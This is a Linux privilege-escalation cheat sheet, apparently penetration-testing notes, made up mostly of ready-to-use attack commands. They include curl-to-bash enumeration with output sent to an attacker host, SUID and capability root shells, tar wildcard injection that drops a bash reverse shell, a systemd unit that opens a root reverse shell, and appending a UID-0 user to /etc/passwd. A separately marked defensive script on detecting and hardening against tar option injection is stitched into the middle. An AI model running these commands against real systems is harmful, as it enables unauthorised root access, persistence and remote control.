# Linux Privesc

# utilities

# Linux Exploit Suggester

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh

# linpeas

running linpeas in memory:

on local box:

python3 -m http.server 80
nc -lvnp 443 > linpeas.log

Then on the target:

curl http://10.10.10.10:80/linpeas.sh | bash > /dev/tcp/10.10.10.10/443 2>/dev/null &

# LinEnum

running LinEnum in memory:

on local box:

python3 -m http.server 80
nc -lvnp 443 > LinEnum.log

Then on the target:

curl http://10.10.10.10:80/LinEnum.sh | bash > /dev/tcp/10.10.10.10/443

# Special Permissions

setuid (SUID) bit - When set, files will get executed with the privileges of the file owner.

setgid (SGID) bit - When set on a file, the file will get executed with the privileges of the file group. When set on a directory, files created within that directory will inherit the group of the directory itself.

# SUID

In Linux, SUID (set owner user ID upon execution) is a special type of file permission given to a file. SUID gives temporary permissions to a user to run the program/file with the permissions of the file owner.

For example, the binary used to change your password has the SUID bit set on it (/usr/bin/passwd). This is because changing your password requires writing to the shadow file (/etc/shadow), which you do not have access to but root does, so the binary runs with root privileges to make the change.

# Finding SUID files

find / -type f -user root -perm -4000 2>/dev/null
also
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

# Once found

GTFOBins has a bunch of good examples.

note: sometimes you have to setuid to 0 to get it to work

/usr/bin/vim.basic -c ':py3 import os; os.setuid(0); os.execl("/bin/bash", "/bin/bash")'

# Using SUID for privesc

If you find a root RCE exploit you can use it to elevate privileges in a lower-privileged shell:

./exploit.py "chmod +s /bin/bash"

and then in your other shell:

/bin/bash -p         # The -p flag tells bash to preserve the SUID privileges; otherwise bash drops them and you don't elevate.

# Capabilities

Linux capabilities are similar in principle to SUID but maintained by the kernel.

Finding files with special capabilities:

getcap -r / 2>/dev/null

Enable capabilities for files:

setcap cap_setuid+ep /home/demo/python3    # example: grant cap_setuid (effective + permitted) to a binary

# injecting commands with globs (*)

consider a cronjob which executes the following:

tar cf /home/user/backups/backup.tgz *

looking at LOLBins, tar can run a command through its checkpoint action:

tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

You can exploit the glob expansion by creating files whose names tar parses as options, injecting commands to escalate privileges:

$ printf '#!/bin/bash\nbash -i >& /dev/tcp/10.10.10.10/443 0>&1' > /var/www/html/shell
$ chmod +x /var/www/html/shell
$ touch /var/www/html/--checkpoint=1
$ touch /var/www/html/--checkpoint-action=exec=bash\ shell
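The script below is an added example, not part of the original cheat sheet: it builds a scratch directory with the same option-shaped file names, shows a check that flags them, and contrasts the cron job's `tar cf ... *` with a form that cannot be injected. It assumes bash and a tar that understands `--checkpoint` (GNU tar); the directory, file names and the `touch pwned` marker are constructed for the demo.

```shell
#!/usr/bin/env bash
# Added example, not from the original page: why a root cron job running
# `tar cf backup.tgz *` is dangerous, how to spot the injected file names,
# and how to write the job so glob matches can never become tar options.
# Assumes bash plus a tar that supports --checkpoint (GNU tar); the
# directory, file names and the "touch pwned" marker are all constructed.

# Scratch directory: one normal file plus two names shaped like tar options.
make_demo_dir() {
    dir=$(mktemp -d)
    printf 'hello\n' > "$dir/index.html"
    touch "$dir/--checkpoint=1"
    touch "$dir/--checkpoint-action=exec=touch pwned"
    printf '%s\n' "$dir"
}

# Detection: names starting with '-' in a directory that a privileged job
# globs are the tell-tale of option injection. Output is sorted in the C
# locale so it is stable across systems.
find_option_like_names() {
    ( cd "$1" && for f in ./-*; do [ -e "$f" ] && printf '%s\n' "${f#./}"; done ) | LC_ALL=C sort
}

# Vulnerable form (the cron job described above): the shell expands * to bare
# names, tar parses "--checkpoint-action=exec=touch pwned" as an option and
# runs the command. Only call this deliberately, on a scratch directory.
unsafe_backup() {
    ( cd "$1" && tar -cf "$2" * )
}

# Hardened form: every match is prefixed with "./", so no operand can start
# with '-'. Ending option parsing with "--" (tar -cf "$2" -- *) is the other
# common fix; "./*" is used here because it also works with non-GNU tar.
safe_backup() {
    ( cd "$1" && tar -cf "$2" ./* )
}

# Number of members in an archive, to confirm the option-like names were
# stored as ordinary files rather than consumed as options.
archive_member_count() {
    tar -tf "$1" | wc -l | tr -d ' '
}

# Standalone run: audit the directory, then take the hardened backup.
d=$(make_demo_dir)
echo "suspicious names:"; find_option_like_names "$d"
safe_backup "$d" "$d.tar"
echo "members archived: $(archive_member_count "$d.tar"), marker present: $([ -e "$d/pwned" ] && echo yes || echo no)"
```

Running `unsafe_backup "$d" "$d-unsafe.tar"` on the same scratch directory makes the `pwned` marker appear, which is the behaviour the cron job above exposes; the hardened call never creates it.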

# Exploiting capabilities

python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'

# systemd reverse shell

If you can write to a systemd service file then use the following to give you a revshell as root (the unit must then be enabled/started, or the system rebooted):

[Unit]
Description=Black magic happening, avert your eyes
After=network-online.target
Requires=network-online.target

[Service]
RemainAfterExit=yes
Type=simple
User=root
ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.10.10.10/443; cat <&5 | while read line; do $line 2>&5 >&5; done"

[Install]
WantedBy=default.target

# making rootbash

add the following to a writable file that is run as root

cp /bin/bash /tmp/rootbash && /bin/chmod +s /tmp/rootbash

now you can get an elevated shell:

/tmp/rootbash -p

# Stupid settings

try "su root" with common passwords (root, toor, god), creds you found in config.php, etc.

# writable /etc/passwd

Easy: append a user with UID 0 to the end of the passwd file and su to it.

echo 'user::0:0::/root:/bin/bash' >>/etc/passwd
su - user

alternatively, for persistence you can create a user entry with a password hash:

openssl passwd -1 -salt gnnr gnnr               # short
mkpasswd -m SHA-512 gnnr                        # long

and then append it (replacing GENERATED_PASSWORD_HERE with the hash printed above):

echo 'gnnr:GENERATED_PASSWORD_HERE:0:0:gnnr:/root:/bin/bash' >> /etc/passwd

# kernel exploits

searchsploit for the kernel number or distro version:

searchsploit centos 4.8
searchsploit linux kernel 2.6

NOTE: Searchsploit may not have what you need. Google is your friend, also https://github.com/SecWiki/linux-kernel-exploits/

cross compiling exploits for 32-bit systems:

sudo apt install gcc-multilib                                # install gcc multilib if missing
gcc -m32 -Wl,--hash-style=both XXXX.c -o exploit             # dynamically link (try this first)
gcc --static -m32 -Wl,--hash-style=both XXXX.c -o exploit    # statically link (if the target lacks the needed libs)